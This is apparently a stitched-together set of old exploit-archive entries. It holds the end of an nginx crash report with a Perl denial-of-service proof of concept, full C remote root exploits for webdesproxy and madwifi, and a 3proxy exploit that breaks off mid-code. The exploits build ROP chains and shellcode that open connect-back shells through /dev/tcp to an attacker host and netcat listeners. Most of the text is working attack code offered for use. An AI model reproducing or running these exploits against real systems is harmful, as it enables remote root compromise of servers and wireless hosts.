eip 0x8068f23 0x8068f23 <__gmon_start__@plt+126827>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: /usr/sbin/nginx, process 3577
debian:~#
in nginx error log we can see :
2009/10/15 01:53:24 [alert] 2477#0: worker process 3577 exited on signal 11
===============================
here is same test on nginx compiled with debug :
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
793 header.data[header.len++] = '.';
(gdb) bt
#0 ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
#1 0x08069c63 in ngx_http_process_request_line (rev=0x80c95d8) at
src/http/ngx_http_request.c:702
#2 0x080668ff in ngx_http_init_request (rev=0x80c95d8) at
src/http/ngx_http_request.c:446
#3 0x0805f67e in ngx_epoll_process_events (cycle=0x80a59e8, timer=60000,
flags=<value optimized out>)
at src/event/modules/ngx_epoll_module.c:518
#4 0x08056712 in ngx_process_events_and_timers (cycle=0x80a59e8) at
src/event/ngx_event.c:245
#5 0x0805cebd in ngx_worker_process_cycle (cycle=0x80a59e8, data=0x0) at
src/os/unix/ngx_process_cycle.c:728
#6 0x0805b9b1 in ngx_spawn_process (cycle=0x80a59e8, proc=0x805c8a2
<ngx_worker_process_cycle>, data=0x0,
name=0x808e46b "worker process", respawn=-2) at
src/os/unix/ngx_process.c:187
#7 0x0805c470 in ngx_start_worker_processes (cycle=0x80a59e8, n=1, type=-2)
at src/os/unix/ngx_process_cycle.c:327
#8 0x0805d442 in ngx_master_process_cycle (cycle=0x80a59e8) at
src/os/unix/ngx_process_cycle.c:119
#9 0x0804ae5b in main (argc=1, argv=0xbfd72ac4) at src/core/nginx.c:332
(gdb) i r $eip
eip 0x8068e52 0x8068e52 <ngx_http_process_request_headers+273>
(gdb)
===============================
tested on versions 0.7.0 <= 0.7.61, 0.6.0 <= 0.6.38, 0.5.0 <= 0.5.37, 0.4.0
<= 0.4.14
================================
here is POC:
#!/usr/bin/perl
use IO::Socket;
if ($#ARGV != 0) {
print "Usage: ./nginx.pl <hostname>\n";
exit;}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$mysize = 4079;
$mymsg = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";
while(<$sock>) {
print;
}
Xpl017Elz/webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield) ( linux)
/*
**
** Fedora Core 6 (exec-shield) based
** Webdesproxy (webdesproxy-0.0.1.tgz) remote root exploit
** (reverse connect-back method) by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** vendor: http://webdesproxy.sourceforge.net/
**
** vade79/v9 v9@fakehalo.us (fakehalo/realhalo)'s exploit:
** http://fakehalo.us/xwdp-cygwin.c
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** We should focus on uninitialized pb structure variable on .bss.
** This static variable is quite useful. we can put a command to run here.
** We only should be careful for arguments of execle().
** A null byte goes after "/bin/sh" and "-c" option in .bss.
**
** --
** execle("/bin/sh\0","/bin/sh\0","-c\0", conn-back_shell, 0x00000000, 0x00000000);
** [argument end] [environment ptr]
** --
**
** Also I search for 8bytes of null from stack to define environment variable.
** To get here, I made 13 ret(pop %eip) codes. In case you have different
** stack structure, you may have to change the number of ret code.
** Make sure there are 2 words of null after the arguments and at the position of
** environment pointer.
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
/*
** Fedora Core release 6 (Zod)
** 2.6.18-1.2798.fc6 #1
** locale (GNU libc) 2.5
** gcc version 4.1.1 20061011 (Red Hat 4.1.1-30)
** webdesproxy 0.0.1 tarball src compile (webdesproxy-0.0.1.tgz)
*/
#define EXIT_GOT 0x0804b1a8 // exit GOT
#define EXIT_PLT 0x08048bf8 // exit PLT
#define STRCPY_PLT 0x08048b18 // <strcpy@plt>
#define MOVE_ESP 0x0804aa26 // <__libc_csu_init+102>
#define RET_CODE 0x0804aa73 // <_fini+27>: ret
#define NULL_STR 0x08050a40 // <pb+4096> (null)
#define EXECLE_16_0xff 0x0804b19a // (execle()>>16)&0xff // fork()
#define EXECLE_08_0xff 0x0804b17d // (execle()>>8)&0xff // bind()
#define EXECLE_00_0xff 0x08048a4f // (execle()>>0)&0xff // <read@plt+7>
/* .bss section */
#define BIN_SH_LOC 0x0804fbcb // <pb+395> struct pb pb; // /bin/sh
#define BIN_SH_END (BIN_SH_LOC)+7 // <pb+402>
#define C_OPTION_LOC (BIN_SH_LOC)+8 // <pb+403> // -c
#define C_OPTION_END (BIN_SH_LOC)+10 // <pb+405>
#define CONN_BACK_LOC (BIN_SH_LOC)+11 // <pb+406> // conn-back shell
#define RET_CODE_COUNT 13
int main(int argc,char *argv[]){
int i=0,l=0,sock;
unsigned char ex_buf[4096];
struct hostent *se;
struct sockaddr_in saddr;
memset((char *)ex_buf,0,sizeof(ex_buf));
printf("\n Fedora Core 6 (exec-shield) based\n"
" Webdesproxy (webdesproxy-0.0.1.tgz) remote root exploit\n"
" by Xpl017Elz\n\n");
if(argc<6){
printf(" Usage: %s [host] [port] [conn-back host] [input port] [output port]\n",argv[0]);
printf(" Example: %s webdesproxy.host.co.kr 8080 hax0r.kr 8282 8383\n\n",argv[0]);
return -1;
}
sprintf(ex_buf,"GET http://");
l=strlen(ex_buf);
for(i=0;i<220;i++){
ex_buf[l++]=0x78;
}
i=0;
printf(" [+] make execle() address.\n");
{
/* (execle()>>0)&0xff */
*(long *)&ex_buf[l]=STRCPY_PLT;
l+=4;
*(long *)&ex_buf[l]=MOVE_ESP;
l+=4;
*(long *)&ex_buf[l]=EXIT_GOT+i++;
l+=4;
*(long *)&ex_buf[l]=EXECLE_00_0xff;
l+=4;
/* (execle()>>8)&0xff */
*(long *)&ex_buf[l]=STRCPY_PLT;
l+=4;
*(long *)&ex_buf[l]=MOVE_ESP;
l+=4;
*(long *)&ex_buf[l]=EXIT_GOT+i++;
l+=4;
*(long *)&ex_buf[l]=EXECLE_08_0xff;
l+=4;
/* (execle()>>16)&0xff */
*(long *)&ex_buf[l]=STRCPY_PLT;
l+=4;
*(long *)&ex_buf[l]=MOVE_ESP;
l+=4;
*(long *)&ex_buf[l]=EXIT_GOT+i++;
l+=4;
*(long *)&ex_buf[l]=EXECLE_16_0xff;
l+=4;
}
/* #1 make null byte */
*(long *)&ex_buf[l]=STRCPY_PLT;
l+=4;
*(long *)&ex_buf[l]=MOVE_ESP;
l+=4;
*(long *)&ex_buf[l]=BIN_SH_END; // "/bin/sh\0"
l+=4;
*(long *)&ex_buf[l]=NULL_STR;
l+=4;
/* #2 make null byte */
*(long *)&ex_buf[l]=STRCPY_PLT;
l+=4;
*(long *)&ex_buf[l]=MOVE_ESP;
l+=4;
*(long *)&ex_buf[l]=C_OPTION_END; // "-c\0"
l+=4;
*(long *)&ex_buf[l]=NULL_STR;
l+=4;
printf(" [+] execle() argument align padddding...\n");
for(i=0;i<RET_CODE_COUNT;i++){
*(long *)&ex_buf[l]=RET_CODE; /* ret(pop %eip) code */
l+=4;
}
printf(" [+] make execute command.\n");
{
/*
** --
** execle("/bin/sh","/bin/sh","-c",conn-back_shell,0x00000000,0x00000000);
** --
*/
*(long *)&ex_buf[l]=EXIT_PLT; /* exit PLT */
l+=4;
*(long *)&ex_buf[l]=0x82828282; /* dummy */
l+=4;
*(long *)&ex_buf[l]=BIN_SH_LOC; /* argv[0] */
l+=4;
*(long *)&ex_buf[l]=BIN_SH_LOC; /* argv[1] */
l+=4;
*(long *)&ex_buf[l]=C_OPTION_LOC; /* argv[2] */
l+=4;
*(long *)&ex_buf[l]=CONN_BACK_LOC; /* argv[3] */
l+=4;
}
printf(" [+] make connect-back shell command.\n");
{
/* overwrite .bss section */
sprintf(ex_buf+l,"/bin/shx-cxsh</dev/tcp/%s/%d>/dev/tcp/%s/%d;\n",argv[3],atoi(argv[4]),argv[3],atoi(argv[5]));
l=strlen(ex_buf);
}
printf(" [+] connect host: %s:%d.\n",argv[1],atoi(argv[2]));
se=gethostbyname(argv[1]);
if(se==NULL){
printf(" [-] gethostbyname() error.\n\n");
return -1;
}
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1){
printf(" [-] socket() error.\n\n");
return -1;
}
saddr.sin_family=AF_INET;
saddr.sin_port=htons(atoi(argv[2]));
saddr.sin_addr=*((struct in_addr *)se->h_addr);
bzero(&(saddr.sin_zero),8);
i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
if(i==-1){
printf(" [-] connect() error.\n\n");
return -1;
}
printf(" [+] exploit size: %d.\n",l);
printf(" [+] send exploit.\n");
send(sock,ex_buf,l,0);
close(sock);
printf(" [*] checking, your connect-back host. :-}\n\n");
exit(0);
}
/* eox */
// milw0rm.com [2007-05-14]
Massimiliano Olda./madwifi <= 0.9.2.1 WPA/RSN IE Remote Kernel Buffer Overflow Exploit ( linux)
/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------
* expoit code by: sgrakkyu <at> antifork.org -- 10/1/2007
*
* CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES)
*
* (for wpa)
* ....
* memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2)
* ....
* ....
* the function re-uses args in the stack before returning so we
* can't trash them overwriting.
* Different compiled module [ex. different version of gcc] may require
* a different pad value.. (see -g option)
*
* ex:
* on one terminal runs: nc -l -p 31337
* phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon
* phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
* phi:~/kexec/lorcon# ifconfig ath1 up
* phi:~/kexec/lorcon# ./madwifi_exp -i ath1 -d madwifing -a 10.0.0.1 -p 31337
* [opt-ip]: 10.0.0.1
* [opt-port]: 31337
* [opt-iface]: ath1
* [opt-driver]: madwifing
* [opt-jump]: 0xffffe777
* [pad]: 36
*
* [*][Low Avail Byte]: 103
* [*][High Avail Byte]: 47
* [*][u_code[] (high)size]: 91, [ring0_code[] (low)size]: 47
* [*][ patching jump ]: [eba7]
* [*][Payload space]: 192
* [*][beacon_frame-80211]=54
* [*][beacon_WPA_IE_lenght]: 198
*
* [printing frame - start]
* 80 00 00 00 ff ff ff ff ff ff cc cc cc cc cc cc
* cc cc cc cc cc cc 00 00 00 00 00 00 00 00 00 00
* 64 00 01 00 00 03 41 41 41 01 08 82 84 8b 96 0c
* 18 30 48 03 01 0b dd c6 00 50 f2 01 01 00 90 90
* 90 90 90 90 90 90 90 90 90 90 31 c0 89 c3 40 40
* ....
* ....
*
*
* Tuning option:
* - depending on gcc version/optimization we have to change the padding of vector
* payload, take a look to the following disassembly of the module wlan.o compiled
* with gcc-4.0 (kernel compiled for i586):
*
* 00015a49 <giwscan_cb>:
* 15a49: 55 push %ebp
* 15a4a: 57 push %edi
* 15a4b: 56 push %esi
* 15a4c: 53 push %ebx
* 15a4d: 81 ec c4 00 00 00 sub $0xbc,%esp <--16+188=[204]
* .........
* .........
* .........
* 15fc3: 8d 54 24 12 lea 0xa(%esp),%edx <-esp+[10]
* 15fc7: 89 d7 mov %edx,%edi
* ...
* ...
* 15fd5: f3 a5 rep movsl %ds:(%esi),%es:(%edi)
*
*
* this is not a rule, check gcc generated code to calculate correct pad value :
* [startbuf-ret] = (16 + 188 - 10) = 194 byte
* PAD = 194 - SHELLCODE_SPACE - IEWPAheader(code,len,oui) = 194 - 150 - 8 = 36
* ( -g 36 would be the choice in that case)
*
* NOTE: 1) the remote box must call the ioctl() SIOCGIWSCAN
* for ex. when the iface gets up or during iwlist iface scanning
* command
*
* 2) if you need more space for kernel mode code you can rely on
* struct ieee80211_scan_entry paramter of gwiscan_cb()
* function to access the real frame (a trivial joke)
*
* 3) i had no time to test this exploit on other boxes..:
* tested only on: Slackware 10 - madwifi 0.9.2
* Kubuntu - kernel 2.6.17 - madwifi 0.9.2
*
*
* TNX TNX TNX twiz <at> antifork.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <getopt.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <tx80211.h>
#include <tx80211_packet.h>
#include <linux/wireless.h>
#include <arpa/inet.h>
/* 2.6.17 VSYSCALL: for >= 2.6.18 without fixed-vsyscall entry use kernel hardcoded value */
#define VSYSCALL_JMP_ESP_OFFSET 0xffffe777
#define IE_ZERO 0x00000000
#define FIX_BYTE(base,offset,byte) *(((unsigned char*)base) + offset) = byte;
#define FIX_WORD(base,offset,word) *((unsigned short *)((unsigned char*)base + offset)) = word;
#define FIX_DWORD(base,offset,dword) *((unsigned int *)((unsigned char*)base + offset)) = dword;
/* shellcode max buffer */
/* 8 bytes used for lenght + oui */
#define SHELLCODE_SPACE 150
#define PAD_SPACE 36
#define PAYLOAD_SPACE (SHELLCODE_SPACE + pad_space + 4 + 2)
#define TOTAL_PACKET_LEN (sizeof(beacon_80211_wpa) -1 + PAYLOAD_SPACE)
/* exp option */
char *iface = NULL; /* needed */
char *driver = NULL; /* needed */
char *ip = NULL; /* needed */
short port = 0; /* needed */
unsigned int jmp_address = VSYSCALL_JMP_ESP_OFFSET;
unsigned int pad_space = PAD_SPACE;
/* ----------------------------------- */
#define SUB_OFFSET_PATCH 8
char ring0_code[]=
"\xe8\x00\x00\x00\x00" //call 8048359 <main+0x21>
"\x5e" //pop %esi
"\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */
"\x31\xc0" //xor %eax,%eax
"\xb0\x04" //mov $0x4,%al
"\x01\xc4" //add %eax,%esp
"\x83\x3c\x24\x73" //cmp $0x73,%esp
"\x75\xf8" //jne 8048364 <main+0x2c>
"\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp)
"\x75\xf1" //jne 8048364 <main+0x2c>
"\x29\xc4" //sub %eax,%esp
"\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi
"\x89\x3c\x24" //mov %edi,(%esp)
"\x31\xc9" //xor %ecx,%ecx
"\xb1\x5b" //mov $0x5b,%cl /* FIX */
"\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi)
"\xcf"; //iret
/* connect back */
#define IP_OFFSET 35
#define PORT_OFFSET 44
char u_code[] =
"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d"
"\xbe"
"\xf5\xff\xff\xfe" // ~ip
"\xf7\xd6\x56\x66\xbd"
"\x69\x7a" // port
"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
/* 802.11header + WPA IE prolog */
#define WPA_LEN_OFFSET 55
#define CHANNEL 11
char beacon_80211_wpa[] =
"\x80" // management frame / subtype beacon
"\x00" // flags
"\x00\x00" // duration
"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr
"\xCC\xCC\xCC\xCC\xCC\xCC" // src address
"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid
"\x00\x00" // seq
"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp
"\x64\x00" // interval
"\x01\x00" // caps
"\x00\x03\x41\x41\x41" // ssid Information Element
"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element
"\x03\x01\x0B" // channel Information Element (11)
"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len)
#define JUMP_OFFSET_PATCH 1
char jmp_back[]="\xeb\x00";
/* ----------------------------------- */
void usage(char *prog)
{
printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog);
}
unsigned char *build_frame()
{
int i,j;
char *frame = malloc(TOTAL_PACKET_LEN);
char *ptr = frame;
unsigned int hsb = sizeof(ring0_code)-1;
unsigned int lsb = SHELLCODE_SPACE - hsb;
printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n",
lsb, hsb);
printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n",
sizeof(u_code)-1, sizeof(ring0_code)-1);
/* fix jump */
int b = -4 - pad_space - (sizeof(jmp_back)-1) - (sizeof(ring0_code)-1);
FIX_BYTE(jmp_back, JUMP_OFFSET_PATCH, b);
/* fix ring0_code/u_code displacement */
unsigned int sub = 5 + (sizeof(u_code)-1);
FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub);
printf("[*][payload space]: %d\n", PAYLOAD_SPACE);
/* fix beacon_80211_wpa: WPA len */
FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);
printf("[*][beacon_WPA_IE_lenght]: %u\n",
(unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]);
/* fill frame */
memset(frame, 0x00, TOTAL_PACKET_LEN);
memcpy(ptr, beacon_80211_wpa, sizeof(beacon_80211_wpa)-1);
ptr += (sizeof(beacon_80211_wpa)-1);
memset(ptr, 0x90, lsb - (sizeof(u_code)-1));
ptr += (lsb - (sizeof(u_code)-1));
memcpy(ptr, u_code, sizeof(u_code) -1);
ptr += (sizeof(u_code) -1);
memcpy(ptr, ring0_code, sizeof(ring0_code)-1);
ptr += sizeof(ring0_code)-1;
for(i=0; i<pad_space; i+=4)
*((unsigned int *)(ptr + i)) = (IE_ZERO+(i/4));
ptr += pad_space;
*((unsigned int *)(ptr)) = jmp_address;
ptr += 4;
memcpy(ptr, jmp_back, sizeof(jmp_back)-1);
ptr += sizeof(jmp_back)-1;
return (unsigned char*)frame;
}
void print_frame(unsigned char *frame, unsigned int size)
{
int i;
printf("\n[printing frame - start]\n ");
for(i=1; i<=size; i++)
{
printf("%02x ", frame[i-1]);
if((i % 16) == 0)
printf("\n ");
}
printf("\n[printing frame - end]\n");
}
void parse_arg(int argc, char **argv)
{
int opt;
struct in_addr in;
while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF)
{
switch(opt)
{
case 'j':
jmp_address = strtoll(optarg, NULL, 16);
break;
case 'a':
ip = strdup(optarg);
inet_aton(ip, &in);
FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr));
break;
case 'p':
port = atoi(optarg);
FIX_WORD(u_code, PORT_OFFSET, port);
break;
case 'd':
driver = strdup(optarg);
break;
case 'i':
iface = strdup(optarg);
break;
case 'g':
pad_space = atoi(optarg);
break;
default:
usage(argv[0]);
exit(1);
}
}
}
int main(int argc, char *argv[])
{
int i=0;
struct tx80211 in_tx;
struct tx80211_packet in_packet;
int drivertype;
parse_arg(argc, argv);
if(!iface || !driver || !ip || !port)
{
usage(argv[0]);
exit(1);
}
printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu <at> antifork.org\n"
"-------------------- **** ------------------\n"
"[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n"
"-------------------- **** ------------------\n\n",
ip, port, iface, driver, jmp_address, pad_space);
unsigned char *frame = build_frame();
print_frame(frame, TOTAL_PACKET_LEN);
/* Use the command-line argument as the desired driver type */
drivertype = tx80211_resolvecard(driver);
/* Validate the driver name specified */
if (drivertype == INJ_NODRIVER)
{
fprintf(stderr, "Driver name not recognized.\n");
return -1;
}
if (tx80211_init(&in_tx, iface, drivertype) < 0) {
fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);
return -1;
}
if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0)
{
fprintf(stderr, "Driver does not support transmitting control frames.\n");
return -1;
}
if (tx80211_setchannel(&in_tx, CHANNEL) < 0)
{
fprintf(stderr, "Error setting channel.\n");
return 1;
}
if (tx80211_open(&in_tx) < 0)
{
fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
return 1;
}
/* Initialized in_packet with packet contents and length of the packet */
in_packet.packet = frame;
in_packet.plen = TOTAL_PACKET_LEN;
printf("[sending packets]: about 10 a second\n");
while(i < 10000)
{
/* Transmit the packet */
if (tx80211_txpacket(&in_tx, &in_packet) < 0)
{
fprintf(stderr, "Unable to transmit packet.\n");
perror("txpacket");
return 1;
}
i++;
usleep(100000);
}
/* Close the socket after transmitting the packet */
tx80211_close(&in_tx);
return 0;
}
// milw0rm.com [2007-03-01]
Xpl017Elz/3proxy 0.5.3g proxy.c logurl() Remote Overflow Exploit (exec-shield) ( linux)
/*
**
** Fedora Core 5,6 (exec-shield) based
** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit
** (reverse connect-back method) by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/23545
** vendor: http://3proxy.ru/
**
** vade79/v9 v9@fakehalo.us (fakehalo/realhalo)'s exploit:
** http://www.milw0rm.com/exploits/3821 (x3proxy.c)
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** It is a relatively easy exploit case.
** It doesn't need any exec family functions or manipulating address of
** system() function, popen() function.
**
** It just needs simple set of strings to make a connect-back shell.
** for some hosts that don't have netcat, we organize attack code like this.
**
** --
** (gdb) x/s 0x08051e5c
** 0x8051e5c: "sh</dev/tcp/8282828282/56789>/dev/tcp/8282828282/5678"
** (gdb)
** --
**
** Let the 56789 port of attacker's server be opened and
** when the attack is succeed hacker can SEND a COMMAND through the port.
**
** --
** $ nc -l -p 56789
** --
**
** Now, we open another port(this time 5678) on attacker's server and
** when the attack is succeed hacer can GET a RESULT through the port.
**
** --
** $ nc -l -p 5678
** --
**
** It's very simple and easy!
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
/*
** Fedora Core release 6 (Zod)
** 2.6.18-1.2798.fc6 #1
** locale (GNU libc) 2.5
** gcc version 4.1.1 20061011 (Red Hat 4.1.1-30)
** 3proxy HTTP Proxy 0.5.3g tarball src compile (3proxy-0.5.3g.tgz)
*/
#define FC6_STRCPY_PLT 0x08048e3c // <strcpy@plt>
#define FC6_MOVE_ESP 0x0804f7c5 // <__do_global_ctors_aux> epilogue
#define FC6_CMD_LOC 0x08051e5c
#define FC6_NULL_STR 0x08051e4c // 0x00000000
#define FC6_NUM 0x08050d74 // "0"
#define FC6_SH_STR 0x08048703 // "fflush"
#define FC6_REDIR_1 0x080481ec // "<\0"
#define FC6_REDIR_2 0x0804e49b // ">\0"
#define FC6_SLASH_STR 0x08050d7f // "/\0"
#define FC6_DEV_STR1 0x08050d5d // "de"
#define FC6_DEV_STR2 0x08050d6f // "v"
#define FC6_TCP_STR1 0x0805065f // "/t"
#define FC6_TCP_STR2 0x08048709 // "strcpy"
#define FC6_PORT_56789 0x08050d79 // "56789+/"
#define FC6_SYSTEM_PLT 0x08048cbc // <system@plt>
/*
** Fedora Core release 5 (Bordeaux)
** 2.6.15-1.2054_FC5 #1
** locale (GNU libc) 2.4
** gcc version 4.1.0 20060304 (Red Hat 4.1.0-3)
** 3proxy HTTP Proxy 0.5.3g tarball src compile (3proxy-0.5.3g.tgz)
*/
#define FC5_STRCPY_PLT 0x08049194 // <strcpy@plt>
#define FC5_MOVE_ESP 0x0804f9a6 // <__do_global_ctors_aux> epilogue
#define FC5_CMD_LOC 0x08051e5c
#define FC5_NULL_STR 0x08051e4c // 0x00000000
#define FC5_NUM 0x08050f54 // "0"
#define FC5_SH_STR 0x08048938 // "fflush"
#define FC5_REDIR_1 0x080495bc // "<\0"
#define FC5_REDIR_2 0x0804e68b // ">\0"
#define FC5_SLASH_STR 0x08049ec3 // "/\0"
#define FC5_DEV_STR1 0x08050f3d // "de"
#define FC5_DEV_STR2 0x08050f4f // "v"
#define FC5_TCP_STR1 0x0805083b // "/t"
#define FC5_TCP_STR2 0x080488e4 // "strcpy"
#define FC5_PORT_56789 0x08050f59 // "56789+/"
#define FC5_SYSTEM_PLT 0x08048ed4 // <system@plt>
int main(int argc,char *argv[]){
u_long strcpy_plt;
u_long move_esp;
u_long cmd_loc;
u_long null_str;
u_long num;
u_long sh_str;
u_long redir_1;
u_long redir_2;
u_long slash_str;
u_long dev_str1;
u_long dev_str2;
u_long tcp_str1;
u_long tcp_str2;
u_long port_56789;
u_long system_plt;
struct hostent *se;
struct sockaddr_in saddr;
unsigned char do_ex[4096];
int i,l,sock;
u_long ip,ip1,ip2,ip3,ip4;
unsigned char attacker_ip[256];
char host[256];
int port=3128;
ip=ip1=ip2=ip3=ip4;
memset((char *)do_ex,0,sizeof(do_ex));
printf("/*\n**\n** Fedora Core 5,6 (exec-shield) based\n"
"** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit\n"
"** by Xpl017Elz\n**\n");
if(argc<5){
printf("** Usage: %s [host] [port] [attacker ip] [type]\n",argv[0]);
printf("**\n** host: 3proxy HTTP Proxy server\n");
printf("** port: default 3128\n");
printf("** attacker ip: attacker netcat host\n");
printf("** type: {0} - Fedora Core release 5 (Bordeaux), exec-shield default enabled.\n");
printf("** {1} - Fedora Core release 6 (Zod), exec-shield default enabled.\n**\n");
printf("** Example: %s 3proxy.use_host.co.kr 3128 82.82.82.82 1\n**\n*/\n",argv[0]);
exit(-1);
}
if(atoi(argv[4])){
strcpy_plt=FC6_STRCPY_PLT;
move_esp=FC6_MOVE_ESP;
cmd_loc=FC6_CMD_LOC;
null_str=FC6_NULL_STR;
num=FC6_NUM;
sh_str=FC6_SH_STR;
redir_1=FC6_REDIR_1;
redir_2=FC6_REDIR_2;
slash_str=FC6_SLASH_STR;
dev_str1=FC6_DEV_STR1;
dev_str2=FC6_DEV_STR2;
tcp_str1=FC6_TCP_STR1;
tcp_str2=FC6_TCP_STR2;
port_56789=FC6_PORT_56789;
system_plt=FC6_SYSTEM_PLT;
} else {
strcpy_plt=FC5_STRCPY_PLT;
move_esp=FC5_MOVE_ESP;
cmd_loc=FC5_CMD_LOC;
null_str=FC5_NULL_STR;
num=FC5_NUM;
sh_str=FC5_SH_STR;
redir_1=FC5_REDIR_1;
redir_2=FC5_REDIR_2;
slash_str=FC5_SLASH_STR;
dev_str1=FC5_DEV_STR1;
dev_str2=FC5_DEV_STR2;
tcp_str1=FC5_TCP_STR1;
tcp_str2=FC5_TCP_STR2;
port_56789=FC5_PORT_56789;
system_plt=FC5_SYSTEM_PLT;
}
sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
#define IP1 16777216
#define IP2 65536
#define IP3 256
ip=0;
ip+=ip1 * (IP1);
ip+=ip2 * (IP2);
ip+=ip3 * (IP3);
ip+=ip4;
memset((char *)attacker_ip,0,256);
sprintf(attacker_ip,"%10lu",ip);
memset((char *)host,0,sizeof(host));
strncpy(host,argv[1],sizeof(host)-1);
port=atoi(argv[2]);
se=gethostbyname(host);
if(se==NULL){
printf("** gethostbyname() error\n**\n*/\n");
return -1;
}
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1){
printf("** socket() error\n**\n*/\n");
return -1;
}
saddr.sin_family=AF_INET;
saddr.sin_port=htons(port);
saddr.sin_addr=*((struct in_addr *)se->h_addr);
bzero(&(saddr.sin_zero),8);
printf("** make exploit\n");
sprintf(do_ex,"GET /");
l=strlen(do_ex);
for(i=0;i<1800-444;i++,l++){
sprintf(do_ex+l,"A");
}
#define __GOGOSSING(dest,index,src){\
*(long *)&dest[index]=src;\
index+=4;\
}
l=0;
__GOGOSSING(do_ex,i,move_esp); /* 0x0d filter */
__GOGOSSING(do_ex,i,0x0d0d0d0d);
__GOGOSSING(do_ex,i,0x0d0d0d0d);
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,sh_str);
l+=2; /* "sh" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,redir_1);
l+=1; /* ">" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,slash_str);
l+=1; /* "/" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,dev_str1);
l+=2; /* "de" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,dev_str2);
l+=1; /* "v" */
